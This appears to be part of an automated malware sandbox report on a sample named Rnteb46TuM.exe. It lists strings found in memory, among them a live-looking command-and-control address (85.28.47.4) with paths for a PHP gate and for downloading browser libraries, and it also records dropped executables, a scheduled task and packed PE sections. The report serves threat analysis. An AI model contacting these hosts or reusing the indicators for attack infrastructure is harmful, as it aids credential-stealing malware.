Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllBn
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllb
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dllh
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A28000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dllm
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A05000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp, 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpZ
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpft
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phps
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.000000000174E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpu
Source: 6e6e496542.exe, 0000000C.00000002.2417828325.0000000001715000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/y
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.00000000019EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
Source: Rnteb46TuM.exe, random[1].exe.10.dr, 6e6e496542.exe.10.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Rnteb46TuM.exe, Rnteb46TuM.exe, 00000000.00000002.2331152818.000000006C80D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Rnteb46TuM.exe, 00000000.00000002.2316554631.000000001D0FF000.00000004.00000020.00020000.00000000.sdmp, Rnteb46TuM.exe, 00000000.00000002.2330958093.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: JKKEHJDH.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: JKKEHJDH.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ep
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.epnacl
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: JKKEHJDH.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, JKKEHJDH.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: JKKEHJDH.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org#
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/ECAAECGD
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Rnteb46TuM.exe, 00000000.00000002.2295449194.00000000005A6000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxl
Source: BKJEGDGIJECGCBGCGHDGIEGCBF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B74000.00000004.00000020.00020000.00000000.sdmp, IEHJDGIDBAAFIDGCGCAK.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

System Summary
barindex
PE file contains section with special chars
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name: .idata
Source: AFBFHDBKJE.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name:
Source: explorti.exe.8.dr Static PE information: section name: .idata
Source: explorti.exe.8.dr Static PE information: section name:
PE file has nameless sections
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: Rnteb46TuM.exe Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: random[1].exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Source: 6e6e496542.exe.10.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C7FB700
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C7FB8C0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C7FB910
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C79F280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_0077F944 0_2_0077F944
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7935A0 0_2_6C7935A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A5440 0_2_6C7A5440
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D5C10 0_2_6C7D5C10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E2C10 0_2_6C7E2C10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80AC00 0_2_6C80AC00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D6CF0 0_2_6C7D6CF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79D4E0 0_2_6C79D4E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BD4D0 0_2_6C7BD4D0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80542B 0_2_6C80542B
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A64C0 0_2_6C7A64C0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80545C 0_2_6C80545C
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F34A0 0_2_6C7F34A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FC4A0 0_2_6C7FC4A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A6C80 0_2_6C7A6C80
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BED10 0_2_6C7BED10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C0512 0_2_6C7C0512
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AFD00 0_2_6C7AFD00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F85F0 0_2_6C7F85F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D0DD0 0_2_6C7D0DD0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79C670 0_2_6C79C670
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B9E50 0_2_6C7B9E50
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D3E50 0_2_6C7D3E50
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E2E4E 0_2_6C7E2E4E
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B4640 0_2_6C7B4640
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F9E30 0_2_6C7F9E30
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8076E3 0_2_6C8076E3
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D7E10 0_2_6C7D7E10
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E5600 0_2_6C7E5600
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79BEF0 0_2_6C79BEF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AFEF0 0_2_6C7AFEF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F4EA0 0_2_6C7F4EA0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C806E63 0_2_6C806E63
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B5E90 0_2_6C7B5E90
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7FE680 0_2_6C7FE680
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D7710 0_2_6C7D7710
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A9F00 0_2_6C7A9F00
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C6FF0 0_2_6C7C6FF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79DFE0 0_2_6C79DFE0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E77A0 0_2_6C7E77A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DF070 0_2_6C7DF070
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B8850 0_2_6C7B8850
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BD850 0_2_6C7BD850
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8050C7 0_2_6C8050C7
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DB820 0_2_6C7DB820
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7E4820 0_2_6C7E4820
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7A7810 0_2_6C7A7810
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BC0E0 0_2_6C7BC0E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D58E0 0_2_6C7D58E0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C60A0 0_2_6C7C60A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7EB970 0_2_6C7EB970
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AD960 0_2_6C7AD960
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7BA940 0_2_6C7BA940
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7CD9B0 0_2_6C7CD9B0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79C9A0 0_2_6C79C9A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D5190 0_2_6C7D5190
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7F2990 0_2_6C7F2990
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80B170 0_2_6C80B170
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C80BA90 0_2_6C80BA90
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D9A60 0_2_6C7D9A60
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C802AB0 0_2_6C802AB0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7B1AF0 0_2_6C7B1AF0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DE2F0 0_2_6C7DE2F0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7D8AC0 0_2_6C7D8AC0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7ACAB0 0_2_6C7ACAB0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7922A0 0_2_6C7922A0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7C4AA0 0_2_6C7C4AA0
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7AC370 0_2_6C7AC370
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C795340 0_2_6C795340
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C8053C8 0_2_6C8053C8
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C7DD320 0_2_6C7DD320
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: 0_2_6C79F380 0_2_6C79F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F1E410 10_2_00F1E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F14CD0 10_2_00F14CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F53048 10_2_00F53048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F47D63 10_2_00F47D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F56EE9 10_2_00F56EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F14AD0 10_2_00F14AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F5763B 10_2_00F5763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F52BB0 10_2_00F52BB0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F5775B 10_2_00F5775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00F58700 10_2_00F58700
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0C3C 12_2_7F7A0C3C
Source: C:\Users\user\AppData\Local\Temp\1000006001\6e6e496542.exe Code function: 12_2_7F7A0000 12_2_7F7A0000
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: String function: 6C7D94D0 appears 90 times
Source: C:\Users\user\Desktop\Rnteb46TuM.exe Code function: String function: 6C7CCBE8 appears 134 times
Sample file is different than original file name gathered from version info
Source: Rnteb46TuM.exe, 00000000.00000002.2331631871.000000006CA15000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Rnteb46TuM.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2299175818.0000000001B86000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUI vs Rnteb46TuM.exe
Source: Rnteb46TuM.exe, 00000000.00000002.2331203873.000000006C822000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Rnteb46TuM.exe
Uses 32bit PE files
Source: Rnteb46TuM.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Rnteb46TuM.exe Static PE information: Section: ZLIB complexity 0.9994759908536586
